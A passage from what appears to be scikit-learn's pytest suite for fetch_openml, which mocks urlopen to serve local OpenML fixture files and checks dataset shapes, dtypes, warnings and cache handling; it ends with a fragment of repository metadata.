target_column=target_column)
check_return_X_y(data_by_id, fetch_func)
return data_by_id
def _monkey_patch_webbased_functions(context,
data_id,
gzip_response):
# monkey patches the urlopen function. Important note: Do NOT use this
# in combination with a regular cache directory, as the files that are
# stored as cache should not be mixed up with real openml datasets
url_prefix_data_description = "https://openml.org/api/v1/json/data/"
url_prefix_data_features = "https://openml.org/api/v1/json/data/features/"
url_prefix_download_data = "https://openml.org/data/v1/"
url_prefix_data_list = "https://openml.org/api/v1/json/data/list/"
path_suffix = '.gz'
read_fn = gzip.open
class MockHTTPResponse:
def __init__(self, data, is_gzip):
self.data = data
self.is_gzip = is_gzip
def read(self, amt=-1):
return self.data.read(amt)
def tell(self):
return self.data.tell()
def seek(self, pos, whence=0):
return self.data.seek(pos, whence)
def close(self):
self.data.close()
def info(self):
if self.is_gzip:
return {'Content-Encoding': 'gzip'}
return {}
def __iter__(self):
return iter(self.data)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
def _file_name(url, suffix):
return (re.sub(r'\W', '-', url[len("https://openml.org/"):])
+ suffix + path_suffix)
def _mock_urlopen_data_description(url, has_gzip_header):
assert url.startswith(url_prefix_data_description)
path = os.path.join(currdir, 'data', 'openml', str(data_id),
_file_name(url, '.json'))
if has_gzip_header and gzip_response:
fp = open(path, 'rb')
return MockHTTPResponse(fp, True)
else:
fp = read_fn(path, 'rb')
return MockHTTPResponse(fp, False)
def _mock_urlopen_data_features(url, has_gzip_header):
assert url.startswith(url_prefix_data_features)
path = os.path.join(currdir, 'data', 'openml', str(data_id),
_file_name(url, '.json'))
if has_gzip_header and gzip_response:
fp = open(path, 'rb')
return MockHTTPResponse(fp, True)
else:
fp = read_fn(path, 'rb')
return MockHTTPResponse(fp, False)
def _mock_urlopen_download_data(url, has_gzip_header):
assert (url.startswith(url_prefix_download_data))
path = os.path.join(currdir, 'data', 'openml', str(data_id),
_file_name(url, '.arff'))
if has_gzip_header and gzip_response:
fp = open(path, 'rb')
return MockHTTPResponse(fp, True)
else:
fp = read_fn(path, 'rb')
return MockHTTPResponse(fp, False)
def _mock_urlopen_data_list(url, has_gzip_header):
assert url.startswith(url_prefix_data_list)
json_file_path = os.path.join(currdir, 'data', 'openml',
str(data_id), _file_name(url, '.json'))
# load the file itself, to simulate a http error
json_data = json.loads(read_fn(json_file_path, 'rb').
read().decode('utf-8'))
if 'error' in json_data:
raise HTTPError(url=None, code=412,
msg='Simulated mock error',
hdrs=None, fp=None)
if has_gzip_header:
fp = open(json_file_path, 'rb')
return MockHTTPResponse(fp, True)
else:
fp = read_fn(json_file_path, 'rb')
return MockHTTPResponse(fp, False)
def _mock_urlopen(request):
url = request.get_full_url()
has_gzip_header = request.get_header('Accept-encoding') == "gzip"
if url.startswith(url_prefix_data_list):
return _mock_urlopen_data_list(url, has_gzip_header)
elif url.startswith(url_prefix_data_features):
return _mock_urlopen_data_features(url, has_gzip_header)
elif url.startswith(url_prefix_download_data):
return _mock_urlopen_download_data(url, has_gzip_header)
elif url.startswith(url_prefix_data_description):
return _mock_urlopen_data_description(url, has_gzip_header)
else:
raise ValueError('Unknown mocking URL pattern: %s' % url)
# XXX: Global variable
if test_offline:
context.setattr(sklearn.datasets._openml, 'urlopen', _mock_urlopen)
@pytest.mark.parametrize('feature, expected_dtype', [
({'data_type': 'string', 'number_of_missing_values': '0'}, object),
({'data_type': 'string', 'number_of_missing_values': '1'}, object),
({'data_type': 'numeric', 'number_of_missing_values': '0'}, np.float64),
({'data_type': 'numeric', 'number_of_missing_values': '1'}, np.float64),
({'data_type': 'real', 'number_of_missing_values': '0'}, np.float64),
({'data_type': 'real', 'number_of_missing_values': '1'}, np.float64),
({'data_type': 'integer', 'number_of_missing_values': '0'}, np.int64),
({'data_type': 'integer', 'number_of_missing_values': '1'}, np.float64),
({'data_type': 'nominal', 'number_of_missing_values': '0'}, 'category'),
({'data_type': 'nominal', 'number_of_missing_values': '1'}, 'category'),
])
def test_feature_to_dtype(feature, expected_dtype):
assert _feature_to_dtype(feature) == expected_dtype
@pytest.mark.parametrize('feature', [
{'data_type': 'datatime', 'number_of_missing_values': '0'}
])
def test_feature_to_dtype_error(feature):
msg = 'Unsupported feature: {}'.format(feature)
with pytest.raises(ValueError, match=msg):
_feature_to_dtype(feature)
def test_fetch_openml_iris_pandas(monkeypatch):
# classification dataset with numeric only columns
pd = pytest.importorskip('panda')
CategoricalDtype = pd.api.types.CategoricalDtype
data_id = 61
data_shape = (150, 4)
target_shape = (150, )
frame_shape = (150, 5)
target_dtype = CategoricalDtype(['Iris-setosa', 'Iris-versicolor',
'Iris-virginica'])
data_dtypes = [np.float64] * 4
data_names = ['sepallength', 'sepalwidth', 'petallength', 'petalwidth']
target_name = 'class'
_monkey_patch_webbased_functions(monkeypatch, data_id, True)
bunch = fetch_openml(data_id=data_id, as_frame=True, cache=False)
data = bunch.data
target = bunch.target
frame = bunch.frame
assert isinstance(data, pd.DataFrame)
assert np.all(data.dtypes == data_dtypes)
assert data.shape == data_shape
assert np.all(data.columns == data_names)
assert np.all(bunch.feature_names == data_names)
assert bunch.target_names == [target_name]
assert isinstance(target, pd.Series)
assert target.dtype == target_dtype
assert target.shape == target_shape
assert target.name == target_name
assert target.index.is_unique
assert isinstance(frame, pd.DataFrame)
assert frame.shape == frame_shape
assert np.all(frame.dtypes == data_dtypes + [target_dtype])
assert frame.index.is_unique
def test_fetch_openml_iris_pandas_equal_to_no_frame(monkeypatch):
# as_frame = True returns the same underlying data as as_frame = False
pytest.importorskip('panda')
data_id = 61
_monkey_patch_webbased_functions(monkeypatch, data_id, True)
frame_bunch = fetch_openml(data_id=data_id, as_frame=True, cache=False)
frame_data = frame_bunch.data
frame_target = frame_bunch.target
norm_bunch = fetch_openml(data_id=data_id, as_frame=False, cache=False)
norm_data = norm_bunch.data
norm_target = norm_bunch.target
assert_allclose(norm_data, frame_data)
assert_array_equal(norm_target, frame_target)
def test_fetch_openml_iris_multitarget_pandas(monkeypatch):
# classification dataset with numeric only columns
pd = pytest.importorskip('panda')
CategoricalDtype = pd.api.types.CategoricalDtype
data_id = 61
data_shape = (150, 3)
target_shape = (150, 2)
frame_shape = (150, 5)
target_column = ['petalwidth', 'petallength']
cat_dtype = CategoricalDtype(['Iris-setosa', 'Iris-versicolor',
'Iris-virginica'])
data_dtypes = [np.float64, np.float64] + [cat_dtype]
data_names = ['sepallength', 'sepalwidth', 'class']
target_dtypes = [np.float64, np.float64]
target_names = ['petalwidth', 'petallength']
_monkey_patch_webbased_functions(monkeypatch, data_id, True)
bunch = fetch_openml(data_id=data_id, as_frame=True, cache=False,
target_column=target_column)
data = bunch.data
target = bunch.target
frame = bunch.frame
assert isinstance(data, pd.DataFrame)
assert np.all(data.dtypes == data_dtypes)
assert data.shape == data_shape
assert np.all(data.columns == data_names)
assert np.all(bunch.feature_names == data_names)
assert bunch.target_names == target_names
assert isinstance(target, pd.DataFrame)
assert np.all(target.dtypes == target_dtypes)
assert target.shape == target_shape
assert np.all(target.columns == target_names)
assert isinstance(frame, pd.DataFrame)
assert frame.shape == frame_shape
assert np.all(frame.dtypes == [np.float64] * 4 + [cat_dtype])
def test_fetch_openml_anneal_pandas(monkeypatch):
# classification dataset with numeric and categorical columns
pd = pytest.importorskip('panda')
CategoricalDtype = pd.api.types.CategoricalDtype
data_id = 2
target_column = 'class'
data_shape = (11, 38)
target_shape = (11,)
frame_shape = (11, 39)
expected_data_categories = 32
expected_data_floats = 6
_monkey_patch_webbased_functions(monkeypatch, data_id, True)
bunch = fetch_openml(data_id=data_id, as_frame=True,
target_column=target_column, cache=False)
data = bunch.data
target = bunch.target
frame = bunch.frame
assert isinstance(data, pd.DataFrame)
assert data.shape == data_shape
n_categories = len([dtype for dtype in data.dtypes
if isinstance(dtype, CategoricalDtype)])
n_floats = len([dtype for dtype in data.dtypes if dtype.kind == 'f'])
assert expected_data_categories == n_categories
assert expected_data_floats == n_floats
assert isinstance(target, pd.Series)
assert target.shape == target_shape
assert isinstance(target.dtype, CategoricalDtype)
assert isinstance(frame, pd.DataFrame)
assert frame.shape == frame_shape
def test_fetch_openml_cpu_pandas(monkeypatch):
# regression dataset with numeric and categorical columns
pd = pytest.importorskip('panda')
CategoricalDtype = pd.api.types.CategoricalDtype
data_id = 561
data_shape = (209, 7)
target_shape = (209, )
frame_shape = (209, 8)
cat_dtype = CategoricalDtype(['adviser', 'amdahl', 'apollo', 'basf',
'bti', 'burroughs', 'c.r.d', 'cdc',
'cambex', 'dec', 'dg', 'formation',
'four-phase', 'gould', 'hp', 'harris',
'honeywell', 'ibm', 'ipl', 'magnuson',
'microdata', 'nas', 'ncr', 'nixdorf',
'perkin-elmer', 'prime', 'siemens',
'sperry', 'sratus', 'wang'])
data_dtypes = [cat_dtype] + [np.float64] * 6
feature_names = ['vendor', 'MYCT', 'MMIN', 'MMAX', 'CACH',
'CHMIN', 'CHMAX']
target_name = 'class'
_monkey_patch_webbased_functions(monkeypatch, data_id, True)
bunch = fetch_openml(data_id=data_id, as_frame=True, cache=False)
data = bunch.data
target = bunch.target
frame = bunch.frame
assert isinstance(data, pd.DataFrame)
assert data.shape == data_shape
assert np.all(data.dtypes == data_dtypes)
assert np.all(data.columns == feature_names)
assert np.all(bunch.feature_names == feature_names)
assert bunch.target_names == [target_name]
assert isinstance(target, pd.Series)
assert target.shape == target_shape
assert target.dtype == np.float64
assert target.name == target_name
assert isinstance(frame, pd.DataFrame)
assert frame.shape == frame_shape
def test_fetch_openml_australian_pandas_error_sparse(monkeypatch):
data_id = 292
_monkey_patch_webbased_functions(monkeypatch, data_id, True)
msg = 'Cannot return dataframe with sparse data'
with pytest.raises(ValueError, match=msg):
fetch_openml(data_id=data_id, as_frame=True, cache=False)
def test_convert_arff_data_dataframe_warning_low_memory_pandas(monkeypatch):
pytest.importorskip('panda')
data_id = 1119
_monkey_patch_webbased_functions(monkeypatch, data_id, True)
msg = 'Could not adhere to working_memory config.'
with pytest.warns(UserWarning, match=msg):
with config_context(working_memory=1e-6):
fetch_openml(data_id=data_id, as_frame=True, cache=False)
def test_fetch_openml_adultcensus_pandas_return_X_y(monkeypatch):
pd = pytest.importorskip('panda')
CategoricalDtype = pd.api.types.CategoricalDtype
data_id = 1119
data_shape = (10, 14)
target_shape = (10, )
expected_data_categories = 8
expected_data_floats = 6
target_column = 'class'
_monkey_patch_webbased_functions(monkeypatch, data_id, True)
X, y = fetch_openml(data_id=data_id, as_frame=True, cache=False,
return_X_y=True)
assert isinstance(X, pd.DataFrame)
assert X.shape == data_shape
n_categories = len([dtype for dtype in X.dtypes
if isinstance(dtype, CategoricalDtype)])
n_floats = len([dtype for dtype in X.dtypes if dtype.kind == 'f'])
assert expected_data_categories == n_categories
assert expected_data_floats == n_floats
assert isinstance(y, pd.Series)
assert y.shape == target_shape
assert y.name == target_column
def test_fetch_openml_adultcensus_pandas(monkeypatch):
pd = pytest.importorskip('panda')
CategoricalDtype = pd.api.types.CategoricalDtype
# Check because of the numeric row attribute (issue #12329)
data_id = 1119
data_shape = (10, 14)
target_shape = (10, )
frame_shape = (10, 15)
expected_data_categories = 8
expected_data_floats = 6
target_column = 'class'
_monkey_patch_webbased_functions(monkeypatch, data_id, True)
bunch = fetch_openml(data_id=data_id, as_frame=True, cache=False)
data = bunch.data
target = bunch.target
frame = bunch.frame
assert isinstance(data, pd.DataFrame)
assert data.shape == data_shape
n_categories = len([dtype for dtype in data.dtypes
if isinstance(dtype, CategoricalDtype)])
n_floats = len([dtype for dtype in data.dtypes if dtype.kind == 'f'])
assert expected_data_categories == n_categories
assert expected_data_floats == n_floats
assert isinstance(target, pd.Series)
assert target.shape == target_shape
assert target.name == target_column
assert isinstance(frame, pd.DataFrame)
assert frame.shape == frame_shape
def test_fetch_openml_miceprotein_pandas(monkeypatch):
# JvR: very important check, as this dataset defined several row ids
# and ignore attributes. Note that data_features json has 82 attributes,
# and row id (1), ignore attributes (3) have been removed.
pd = pytest.importorskip('panda')
CategoricalDtype = pd.api.types.CategoricalDtype
data_id = 40966
data_shape = (7, 77)
target_shape = (7, )
frame_shape = (7, 78)
target_column = 'class'
frame_n_categories = 1
frame_n_floats = 77
_monkey_patch_webbased_functions(monkeypatch, data_id, True)
bunch = fetch_openml(data_id=data_id, as_frame=True, cache=False)
data = bunch.data
target = bunch.target
frame = bunch.frame
assert isinstance(data, pd.DataFrame)
assert data.shape == data_shape
assert np.all(data.dtypes == np.float64)
assert isinstance(target, pd.Series)
assert isinstance(target.dtype, CategoricalDtype)
assert target.shape == target_shape
assert target.name == target_column
assert isinstance(frame, pd.DataFrame)
assert frame.shape == frame_shape
n_categories = len([dtype for dtype in frame.dtypes
if isinstance(dtype, CategoricalDtype)])
n_floats = len([dtype for dtype in frame.dtypes if dtype.kind == 'f'])
assert frame_n_categories == n_categories
assert frame_n_floats == n_floats
def test_fetch_openml_emotions_pandas(monkeypatch):
# classification dataset with multiple targets (natively)
pd = pytest.importorskip('panda')
CategoricalDtype = pd.api.types.CategoricalDtype
data_id = 40589
target_column = ['amazed.suprised', 'happy.pleased', 'relaxing.calm',
'quiet.still', 'sad.lonely', 'angry.aggresive']
data_shape = (13, 72)
target_shape = (13, 6)
frame_shape = (13, 78)
expected_frame_categories = 6
expected_frame_floats = 72
_monkey_patch_webbased_functions(monkeypatch, data_id, True)
bunch = fetch_openml(data_id=data_id, as_frame=True, cache=False,
target_column=target_column)
data = bunch.data
target = bunch.target
frame = bunch.frame
assert isinstance(data, pd.DataFrame)
assert data.shape == data_shape
assert isinstance(target, pd.DataFrame)
assert target.shape == target_shape
assert np.all(target.columns == target_column)
assert isinstance(frame, pd.DataFrame)
assert frame.shape == frame_shape
n_categories = len([dtype for dtype in frame.dtypes
if isinstance(dtype, CategoricalDtype)])
n_floats = len([dtype for dtype in frame.dtypes if dtype.kind == 'f'])
assert expected_frame_categories == n_categories
assert expected_frame_floats == n_floats
def test_fetch_openml_titanic_pandas(monkeypatch):
# dataset with strings
pd = pytest.importorskip('panda')
CategoricalDtype = pd.api.types.CategoricalDtype
data_id = 40945
data_shape = (1309, 13)
target_shape = (1309, )
frame_shape = (1309, 14)
name_to_dtype = {
'pclass': np.float64,
'name': object,
'sex': CategoricalDtype(['female', 'male']),
'age': np.float64,
'sibsp': np.float64,
'parch': np.float64,
'ticket': object,
'fare': np.float64,
'cabin': object,
'embarked': CategoricalDtype(['C', 'Q', 'S']),
'boat': object,
'body': np.float64,
'home.dest': object,
'survived': CategoricalDtype(['0', '1'])
}
frame_columns = ['pclass', 'survived', 'name', 'sex', 'age', 'sibsp',
'parch', 'ticket', 'fare', 'cabin', 'embarked',
'boat', 'body', 'home.dest']
frame_dtypes = [name_to_dtype[col] for col in frame_columns]
feature_names = ['pclass', 'name', 'sex', 'age', 'sibsp',
'parch', 'ticket', 'fare', 'cabin', 'embarked',
'boat', 'body', 'home.dest']
target_name = 'survived'
_monkey_patch_webbased_functions(monkeypatch, data_id, True)
bunch = fetch_openml(data_id=data_id, as_frame=True, cache=False)
data = bunch.data
target = bunch.target
frame = bunch.frame
assert isinstance(data, pd.DataFrame)
assert data.shape == data_shape
assert np.all(data.columns == feature_names)
assert bunch.target_names == [target_name]
assert isinstance(target, pd.Series)
assert target.shape == target_shape
assert target.name == target_name
assert target.dtype == name_to_dtype[target_name]
assert isinstance(frame, pd.DataFrame)
assert frame.shape == frame_shape
assert np.all(frame.dtypes == frame_dtypes)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_iris(monkeypatch, gzip_response):
# classification dataset with numeric only columns
data_id = 61
data_name = 'iris'
data_version = 1
target_column = 'class'
expected_observations = 150
expected_features = 4
expected_missing = 0
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
assert_warns_message(
UserWarning,
"Multiple active versions of the dataset matching the name"
" iris exist. Versions may be fundamentally different, "
"returning version 1.",
_fetch_dataset_from_openml,
**{'data_id': data_id, 'data_name': data_name,
'data_version': data_version,
'target_column': target_column,
'expected_observations': expected_observations,
'expected_features': expected_features,
'expected_missing': expected_missing,
'expect_sparse': False,
'expected_data_dtype': np.float64,
'expected_target_dtype': object,
'compare_default_target': True}
)
def test_decode_iris(monkeypatch):
data_id = 61
_monkey_patch_webbased_functions(monkeypatch, data_id, False)
_test_features_list(data_id)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_iris_multitarget(monkeypatch, gzip_response):
# classification dataset with numeric only columns
data_id = 61
data_name = 'iris'
data_version = 1
target_column = ['sepallength', 'sepalwidth']
expected_observations = 150
expected_features = 3
expected_missing = 0
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
_fetch_dataset_from_openml(data_id, data_name, data_version, target_column,
expected_observations, expected_features,
expected_missing,
np.float64, np.float64, expect_sparse=False,
compare_default_target=False)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_anneal(monkeypatch, gzip_response):
# classification dataset with numeric and categorical columns
data_id = 2
data_name = 'anneal'
data_version = 1
target_column = 'class'
# Not all original instances included for space reasons
expected_observations = 11
expected_features = 38
expected_missing = 267
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
_fetch_dataset_from_openml(data_id, data_name, data_version, target_column,
expected_observations, expected_features,
expected_missing,
np.float64, object, expect_sparse=False,
compare_default_target=True)
def test_decode_anneal(monkeypatch):
data_id = 2
_monkey_patch_webbased_functions(monkeypatch, data_id, False)
_test_features_list(data_id)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_anneal_multitarget(monkeypatch, gzip_response):
# classification dataset with numeric and categorical columns
data_id = 2
data_name = 'anneal'
data_version = 1
target_column = ['class', 'product-type', 'shape']
# Not all original instances included for space reasons
expected_observations = 11
expected_features = 36
expected_missing = 267
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
_fetch_dataset_from_openml(data_id, data_name, data_version, target_column,
expected_observations, expected_features,
expected_missing,
np.float64, object, expect_sparse=False,
compare_default_target=False)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_cpu(monkeypatch, gzip_response):
# regression dataset with numeric and categorical columns
data_id = 561
data_name = 'cpu'
data_version = 1
target_column = 'class'
expected_observations = 209
expected_features = 7
expected_missing = 0
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
_fetch_dataset_from_openml(data_id, data_name, data_version, target_column,
expected_observations, expected_features,
expected_missing,
np.float64, np.float64, expect_sparse=False,
compare_default_target=True)
def test_decode_cpu(monkeypatch):
data_id = 561
_monkey_patch_webbased_functions(monkeypatch, data_id, False)
_test_features_list(data_id)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_australian(monkeypatch, gzip_response):
# sparse dataset
# Australian is the only sparse dataset that is reasonably small
# as it is inactive, we need to catch the warning. Due to mocking
# framework, it is not deactivated in our tests
data_id = 292
data_name = 'Australian'
data_version = 1
target_column = 'Y'
# Not all original instances included for space reasons
expected_observations = 85
expected_features = 14
expected_missing = 0
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
assert_warns_message(
UserWarning,
"Version 1 of dataset Australian is inactive,",
_fetch_dataset_from_openml,
**{'data_id': data_id, 'data_name': data_name,
'data_version': data_version,
'target_column': target_column,
'expected_observations': expected_observations,
'expected_features': expected_features,
'expected_missing': expected_missing,
'expect_sparse': True,
'expected_data_dtype': np.float64,
'expected_target_dtype': object,
'compare_default_target': False} # nump specific check
)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_adultcensus(monkeypatch, gzip_response):
# Check because of the numeric row attribute (issue #12329)
data_id = 1119
data_name = 'adult-census'
data_version = 1
target_column = 'class'
# Not all original instances included for space reasons
expected_observations = 10
expected_features = 14
expected_missing = 0
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
_fetch_dataset_from_openml(data_id, data_name, data_version, target_column,
expected_observations, expected_features,
expected_missing,
np.float64, object, expect_sparse=False,
compare_default_target=True)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_miceprotein(monkeypatch, gzip_response):
# JvR: very important check, as this dataset defined several row ids
# and ignore attributes. Note that data_features json has 82 attributes,
# and row id (1), ignore attributes (3) have been removed (and target is
# stored in data.target)
data_id = 40966
data_name = 'MiceProtein'
data_version = 4
target_column = 'class'
# Not all original instances included for space reasons
expected_observations = 7
expected_features = 77
expected_missing = 7
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
_fetch_dataset_from_openml(data_id, data_name, data_version, target_column,
expected_observations, expected_features,
expected_missing,
np.float64, object, expect_sparse=False,
compare_default_target=True)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_emotions(monkeypatch, gzip_response):
# classification dataset with multiple targets (natively)
data_id = 40589
data_name = 'emotions'
data_version = 3
target_column = ['amazed.suprised', 'happy.pleased', 'relaxing.calm',
'quiet.still', 'sad.lonely', 'angry.aggresive']
expected_observations = 13
expected_features = 72
expected_missing = 0
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
_fetch_dataset_from_openml(data_id, data_name, data_version, target_column,
expected_observations, expected_features,
expected_missing,
np.float64, object, expect_sparse=False,
compare_default_target=True)
def test_decode_emotions(monkeypatch):
data_id = 40589
_monkey_patch_webbased_functions(monkeypatch, data_id, False)
_test_features_list(data_id)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_open_openml_url_cache(monkeypatch, gzip_response, tmpdir):
data_id = 61
_monkey_patch_webbased_functions(
monkeypatch, data_id, gzip_response)
openml_path = sklearn.datasets._openml._DATA_FILE.format(data_id)
cache_directory = str(tmpdir.mkdir('scikit_learn_data'))
# first fill the cache
response1 = _open_openml_url(openml_path, cache_directory)
# assert file exists
location = _get_local_path(openml_path, cache_directory)
assert os.path.isfile(location)
# redownload, to utilize cache
response2 = _open_openml_url(openml_path, cache_directory)
assert response1.read() == response2.read()
@pytest.mark.parametrize('gzip_response', [True, False])
@pytest.mark.parametrize('write_to_disk', [True, False])
def test_open_openml_url_unlinks_local_path(
monkeypatch, gzip_response, tmpdir, write_to_disk):
data_id = 61
openml_path = sklearn.datasets._openml._DATA_FILE.format(data_id)
cache_directory = str(tmpdir.mkdir('scikit_learn_data'))
location = _get_local_path(openml_path, cache_directory)
def _mock_urlopen(request):
if write_to_disk:
with open(location, "w") as f:
f.write("")
raise ValueError("Invalid request")
monkeypatch.setattr(sklearn.datasets._openml, 'urlopen', _mock_urlopen)
with pytest.raises(ValueError, match="Invalid request"):
_open_openml_url(openml_path, cache_directory)
assert not os.path.exists(location)
def test_retry_with_clean_cache(tmpdir):
data_id = 61
openml_path = sklearn.datasets._openml._DATA_FILE.format(data_id)
cache_directory = str(tmpdir.mkdir('scikit_learn_data'))
location = _get_local_path(openml_path, cache_directory)
os.makedirs(os.path.dirname(location))
with open(location, 'w') as f:
f.write("")
@_retry_with_clean_cache(openml_path, cache_directory)
def _load_data():
# The first call will raise an error since location exists
if os.path.exists(location):
raise Exception("File exist!")
return 1
warn_msg = "Invalid cache, redownloading file"
with pytest.warns(RuntimeWarning, match=warn_msg):
result = _load_data()
assert result == 1
def test_retry_with_clean_cache_http_error(tmpdir):
data_id = 61
openml_path = sklearn.datasets._openml._DATA_FILE.format(data_id)
cache_directory = str(tmpdir.mkdir('scikit_learn_data'))
@_retry_with_clean_cache(openml_path, cache_directory)
def _load_data():
raise HTTPError(url=None, code=412,
msg='Simulated mock error',
hdrs=None, fp=None)
error_msg = "Simulated mock error"
with pytest.raises(HTTPError, match=error_msg):
_load_data()
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_cache(monkeypatch, gzip_response, tmpdir):
def _mock_urlopen_raise(request):
raise ValueError('This mechanism intends to test correct cache'
'handling. As such, urlopen should never be '
'accessed. URL: %s' % request.get_full_url())
data_id = 2
cache_directory = str(tmpdir.mkdir('scikit_learn_data'))
_monkey_patch_webbased_functions(
monkeypatch, data_id, gzip_response)
X_fetched, y_fetched = fetch_openml(data_id=data_id, cache=True,
data_home=cache_directory,
return_X_y=True)
monkeypatch.setattr(sklearn.datasets._openml, 'urlopen',
_mock_urlopen_raise)
X_cached, y_cached = fetch_openml(data_id=data_id, cache=True,
data_home=cache_directory,
return_X_y=True)
np.testing.assert_array_equal(X_fetched, X_cached)
np.testing.assert_array_equal(y_fetched, y_cached)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_notarget(monkeypatch, gzip_response):
data_id = 61
target_column = None
expected_observations = 150
expected_features = 5
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
data = fetch_openml(data_id=data_id, target_column=target_column,
cache=False)
assert data.data.shape == (expected_observations, expected_features)
assert data.target is None
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_inactive(monkeypatch, gzip_response):
# fetch inactive dataset by id
data_id = 40675
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
glas2 = assert_warns_message(
UserWarning, "Version 1 of dataset glass2 is inactive,", fetch_openml,
data_id=data_id, cache=False)
# fetch inactive dataset by name and version
assert glas2.data.shape == (163, 9)
glas2_by_version = assert_warns_message(
UserWarning, "Version 1 of dataset glass2 is inactive,", fetch_openml,
data_id=None, name="glass2", version=1, cache=False)
assert int(glas2_by_version.details['id']) == data_id
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_nonexiting(monkeypatch, gzip_response):
# there is no active version of glass2
data_id = 40675
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
# Note that we only want to search by name (not data id)
assert_raise_message(ValueError, "No active dataset glass2 found",
fetch_openml, name='glass2', cache=False)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_raises_illegal_multitarget(monkeypatch, gzip_response):
data_id = 61
targets = ['sepalwidth', 'class']
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
# Note that we only want to search by name (not data id)
assert_raise_message(ValueError,
"Can only handle homogeneous multi-target datasets,",
fetch_openml, data_id=data_id,
target_column=targets, cache=False)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_warn_ignore_attribute(monkeypatch, gzip_response):
data_id = 40966
expected_row_id_msg = "target_column={} has flag is_row_identifier."
expected_ignore_msg = "target_column={} has flag is_ignore."
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
# single column test
assert_warns_message(UserWarning, expected_row_id_msg.format('MouseID'),
fetch_openml, data_id=data_id,
target_column='MouseID',
cache=False)
assert_warns_message(UserWarning, expected_ignore_msg.format('Genotype'),
fetch_openml, data_id=data_id,
target_column='Genotype',
cache=False)
# multi column test
assert_warns_message(UserWarning, expected_row_id_msg.format('MouseID'),
fetch_openml, data_id=data_id,
target_column=['MouseID', 'class'],
cache=False)
assert_warns_message(UserWarning, expected_ignore_msg.format('Genotype'),
fetch_openml, data_id=data_id,
target_column=['Genotype', 'class'],
cache=False)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_string_attribute_without_dataframe(monkeypatch, gzip_response):
data_id = 40945
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
# single column test
assert_raise_message(ValueError,
('STRING attributes are not supported for '
'array representation. Try as_frame=True'),
fetch_openml, data_id=data_id, cache=False)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_dataset_with_openml_error(monkeypatch, gzip_response):
data_id = 1
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
assert_warns_message(
UserWarning,
"OpenML registered a problem with the dataset. It might be unusable. "
"Error:",
fetch_openml, data_id=data_id, cache=False
)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_dataset_with_openml_warning(monkeypatch, gzip_response):
data_id = 3
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
assert_warns_message(
UserWarning,
"OpenML raised a warning on the dataset. It might be unusable. "
"Warning:",
fetch_openml, data_id=data_id, cache=False
)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_illegal_column(monkeypatch, gzip_response):
data_id = 61
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
assert_raise_message(KeyError, "Could not find target_column=",
fetch_openml, data_id=data_id,
target_column='undefined', cache=False)
assert_raise_message(KeyError, "Could not find target_column=",
fetch_openml, data_id=data_id,
target_column=['undefined', 'class'],
cache=False)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_raises_missing_values_target(monkeypatch, gzip_response):
data_id = 2
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
assert_raise_message(ValueError, "Target column ",
fetch_openml, data_id=data_id, target_column='family')
def test_fetch_openml_raises_illegal_argument():
assert_raise_message(ValueError, "Dataset data_id=",
fetch_openml, data_id=-1, name="name")
assert_raise_message(ValueError, "Dataset data_id=",
fetch_openml, data_id=-1, name=None,
version="version")
assert_raise_message(ValueError, "Dataset data_id=",
fetch_openml, data_id=-1, name="name",
version="version")
assert_raise_message(ValueError, "Neither name nor data_id are provided. "
"Please provide name or data_id.", fetch_openml)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_with_ignored_feature(monkeypatch, gzip_response):
# Regression test for #14340
# 62 is the ID of the ZOO dataset
data_id = 62
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
dataset = sklearn.datasets.fetch_openml(data_id=data_id, cache=False)
assert dataset is not None
# The dataset has 17 features, including 1 ignored (animal),
# so we assert that we don't have the ignored feature in the final Bunch
assert dataset['data'].shape == (101, 16)
assert 'animal' not in dataset['feature_names']
| [
"[email protected]"
] | |
4f17b9642923971d36bd340e30cf3088aa9e4934 | 55540f3e86f1d5d86ef6b5d295a63518e274efe3 | /toolchain/riscv/MSYS/python/Lib/test/test_macpath.py | 09609c89ed3cbbeca84d8e94c33db3bb69321b4a | [
"bzip2-1.0.6",
"LicenseRef-scancode-proprietary-license",
